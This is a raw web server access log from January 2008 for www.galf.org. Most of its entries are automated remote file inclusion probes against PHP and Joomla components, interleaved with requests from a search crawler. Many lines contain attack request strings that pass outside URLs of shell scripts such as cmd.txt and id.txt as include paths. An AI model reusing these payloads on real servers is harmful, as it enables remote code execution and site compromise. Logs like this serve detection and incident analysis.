38.102.88.101 - - [14/Jan/2008:12:40:32 -0800] "GET /logs/access_070924.log/com_jcs/view/register.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.102.88.101 - - [14/Jan/2008:12:40:32 -0800] "GET /logs/com_jcs/view/register.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:40:33 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:40:34 -0800] "GET /?N=D HTTP/1.1" 200 1048 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
38.102.88.101 - - [14/Jan/2008:12:40:37 -0800] "GET /logs/access_071022.log/com_jcs/view/register.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:40:41 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
70.86.88.242 - - [14/Jan/2008:12:40:43 -0800] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.88.242 - - [14/Jan/2008:12:40:43 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.88.242 - - [14/Jan/2008:12:40:44 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:40:48 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:40:48 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:40:52 -0800] "GET /logs/access.log/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:40:52 -0800] "GET /index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:40:53 -0800] "GET /logs/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
70.86.88.242 - - [14/Jan/2008:12:40:54 -0800] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:41:04 -0800] "GET /?M=A HTTP/1.1" 200 1048 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
86.109.165.93 - - [14/Jan/2008:12:41:19 -0800] "GET /logs/!scanhttp://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.109.165.93 - - [14/Jan/2008:12:41:19 -0800] "GET /!scanhttp://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:41:34 -0800] "GET /?S=A HTTP/1.1" 200 1048 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
66.168.0.210 - - [14/Jan/2008:12:41:35 -0800] "GET /logs/access_071015.log/1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.168.0.210 - - [14/Jan/2008:12:41:35 -0800] "GET /1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.168.0.210 - - [14/Jan/2008:12:41:35 -0800] "GET /logs/1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.239.177.121 - - [14/Jan/2008:12:41:50 -0800] "GET //components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
213.239.177.121 - - [14/Jan/2008:12:41:50 -0800] "GET /logs//components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://vangeenen.demon.nl/images/jaarwisseling2004/pages/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
203.162.1.36 - - [14/Jan/2008:12:41:51 -0800] "GET //skin/zero_vote/error.php?dir=http://www.kluna.info/mokon.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:42:04 -0800] "GET /?D=A HTTP/1.1" 200 1048 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
74.200.79.215 - - [14/Jan/2008:12:42:11 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.79.215 - - [14/Jan/2008:12:42:11 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.79.215 - - [14/Jan/2008:12:42:11 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:12:42:17 -0800] "GET /logs/access.log/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:42:34 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
89.212.80.130 - - [14/Jan/2008:12:42:49 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:43:04 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:43:34 -0800] "GET /logs/ HTTP/1.1" 200 5473 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:43:41 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:44:04 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
89.212.80.130 - - [14/Jan/2008:12:44:06 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.212.80.130 - - [14/Jan/2008:12:44:06 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.212.80.130 - - [14/Jan/2008:12:44:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.200.79.215 - - [14/Jan/2008:12:44:30 -0800] "GET /logs/access_070827.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:44:34 -0800] "GET /?N=A HTTP/1.1" 200 1048 "http://www.galf.org/?N=D" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:45:04 -0800] "GET /?M=D HTTP/1.1" 200 1048 "http://www.galf.org/?M=A" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:45:30 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:45:34 -0800] "GET /cendoc/?N=D HTTP/1.1" 200 526 "http://www.galf.org/cendoc/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:45:36 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:45:55 -0800] "GET /logs/access_071119.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:45:55 -0800] "GET /logs/access_071119.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:45:55 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:45:55 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:45:55 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:45:55 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:46:01 -0800] "GET /logs/access_071028.log//step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:46:01 -0800] "GET //step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:46:01 -0800] "GET /logs//step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:46:04 -0800] "GET /cendoc/?M=A HTTP/1.1" 200 526 "http://www.galf.org/cendoc/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
70.86.88.242 - - [14/Jan/2008:12:46:26 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.88.242 - - [14/Jan/2008:12:46:26 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:46:27 -0800] "GET /logs/access_071210.log//step_one.php?server_inc=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:46:34 -0800] "GET /cendoc/?S=A HTTP/1.1" 200 526 "http://www.galf.org/cendoc/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
89.212.80.130 - - [14/Jan/2008:12:46:52 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:47:04 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "http://www.galf.org/cendoc/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:47:08 -0800] "GET /logs/access_071029.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:47:08 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:47:08 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:47:34 -0800] "GET /labia/?N=D HTTP/1.1" 200 524 "http://www.galf.org/labia/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:47:41 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:47:41 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:47:52 -0800] "GET /logs/access_071001.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:48:04 -0800] "GET /labia/?M=A HTTP/1.1" 200 524 "http://www.galf.org/labia/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:48:34 -0800] "GET /labia/?S=A HTTP/1.1" 200 524 "http://www.galf.org/labia/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
66.168.0.210 - - [14/Jan/2008:12:49:01 -0800] "GET /logs/access_071224.log/1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:49:05 -0800] "GET /labia/?D=A HTTP/1.1" 200 524 "http://www.galf.org/labia/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:49:35 -0800] "GET /logs/?N=D HTTP/1.1" 200 5473 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:49:46 -0800] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:49:47 -0800] "GET /logs/access_071112.log/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:49:52 -0800] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:49:55 -0800] "GET /logs/access_071105.log//_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:49:55 -0800] "GET //_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:49:55 -0800] "GET /logs//_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:50:05 -0800] "GET /logs/?M=A HTTP/1.1" 200 5473 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
72.32.58.11 - - [14/Jan/2008:12:50:21 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.thepurge.net/dkp//includes/.%20%20%20%20%20%20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.32.58.11 - - [14/Jan/2008:12:50:22 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.thepurge.net/dkp//includes/.%20%20%20%20%20%20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:50:35 -0800] "GET /logs/?S=A HTTP/1.1" 200 5473 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
216.86.151.53 - - [14/Jan/2008:12:50:35 -0800] "GET /logs/access_070910.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.86.151.53 - - [14/Jan/2008:12:50:35 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.86.151.53 - - [14/Jan/2008:12:50:35 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:51:05 -0800] "GET /logs/?D=A HTTP/1.1" 200 5473 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
217.160.203.190 - - [14/Jan/2008:12:51:07 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.160.203.190 - - [14/Jan/2008:12:51:07 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.160.203.190 - - [14/Jan/2008:12:51:08 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.160.203.190 - - [14/Jan/2008:12:51:09 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:51:21 -0800] "GET /logs/access.log/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.103.130.64 - - [14/Jan/2008:12:51:22 -0800] "GET /main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.103.130.64 - - [14/Jan/2008:12:51:22 -0800] "GET /logs/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
202.176.218.45 - - [14/Jan/2008:12:51:34 -0800] "GET /logs/access.log HTTP/1.1" 200 120461 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:51:54 -0800] "GET /logs/access_071217.log/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:51:54 -0800] "GET /logs/access_071112.log//_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:51:55 -0800] "GET /main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.37.240 - - [14/Jan/2008:12:51:55 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.37.240 - - [14/Jan/2008:12:51:56 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:51:56 -0800] "GET /logs/main.php?s=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.86.151.53 - - [14/Jan/2008:12:52:01 -0800] "GET /logs/access_071210.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:52:04 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:52:05 -0800] "GET /logs/access_070709.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:52:08 -0800] "GET /logs/access_071015.log//include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:52:09 -0800] "GET //include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:52:09 -0800] "GET /logs//include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:52:36 -0800] "GET /logs/access_070716.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:53:06 -0800] "GET /logs/access_070723.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:53:27 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:53:28 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:53:36 -0800] "GET /logs/access_070730.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
216.86.151.53 - - [14/Jan/2008:12:54:01 -0800] "GET /logs/access_071022.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.86.151.53 - - [14/Jan/2008:12:54:01 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.86.151.53 - - [14/Jan/2008:12:54:01 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:54:06 -0800] "GET /logs/access_070806.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:54:37 -0800] "GET /logs/access_070813.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
72.9.155.30 - - [14/Jan/2008:12:54:38 -0800] "GET /logs/access_070723.log/index.php?pagina=http://www.nashvillepaintball.com/forums/cache/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.155.30 - - [14/Jan/2008:12:54:38 -0800] "GET /index.php?pagina=http://www.nashvillepaintball.com/forums/cache/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.155.30 - - [14/Jan/2008:12:54:38 -0800] "GET /logs/index.php?pagina=http://www.nashvillepaintball.com/forums/cache/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
